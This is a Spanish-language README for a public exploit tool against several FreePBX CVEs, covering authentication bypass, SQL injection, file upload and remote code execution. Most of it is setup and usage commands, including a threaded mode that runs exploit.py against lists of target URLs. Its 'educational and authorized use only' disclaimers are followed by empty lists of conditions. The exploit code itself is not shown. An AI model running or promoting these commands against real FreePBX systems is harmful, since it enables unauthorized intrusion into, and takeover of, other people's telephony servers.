
Esta vulnerabilidad permite a atacantes remotos autenticados y no autenticados ejecutar código remoto en instancias FreePBX vulnerables. Estos problemas se han corregido en las versiones de FreePBX 16.0.42, 16.0.92, 17.0.6 y 17.0.22. Es importante señalar que esta vulnerabilidad de omisión de autenticación no está presente en la configuración predeterminada de FreePBX.
SOLO PARA PRUEBAS EDUCATIVAS Y AUTORIZADAS
AL USAR ESTA HERRAMIENTA, USTED ACEPTA USARLA DE MANERA LEGAL Y ÉTICA.
Una herramienta de evaluación de seguridad para detectar vulnerabilidades críticas en sistemas FreePBX.
requirements.txt para las dependenciasgit clone https://github.com/BimBoxH4/CVE-2025-66039_CVE-2025-61675_CVE-2025-61678_reePBX.git
cd CVE-2025-66039_CVE-2025-61675_CVE-2025-61678_reePBX
pip3 install -r requirements.txt
# Single target scan
python3 exploit.py -u http://target-ip
# Multiple targets with threads
python3 exploit.py -l targets.txt -t 10
# Debug mode
python3 exploit.py -u http://target-ip -d
# Save results
python3 exploit.py -l targets.txt -o results.txt
# All checks (default)
python3 exploit.py -u http://target-ip --mode all
# File upload only
python3 exploit.py -u http://target-ip --mode upload
# SQL injection only
python3 exploit.py -u http://target-ip --mode sql
# Auth bypass only
python3 exploit.py -u http://target-ip --mode auth
| Argumento | Descripción |
|---|---|
-u, --url | URL de un solo objetivo |
-l, --list | Archivo con URLs objetivo (una por línea) |
-t, --threads | Número de hilos (predeterminado: 1) |
-o, --output | Archivo de salida para resultados |
-d, --debug | Habilitar modo depuración |
--mode | Modo de escaneo: all, upload, sql, auth |
http://192.168.1.100
http://192.168.1.101
https://freepbx.example.com
# Comments start with #
Use esta herramienta solo si:
Nunca:
⚠️ RECUERDE: El acceso no autorizado es ilegal. ¡Úselo responsablemente!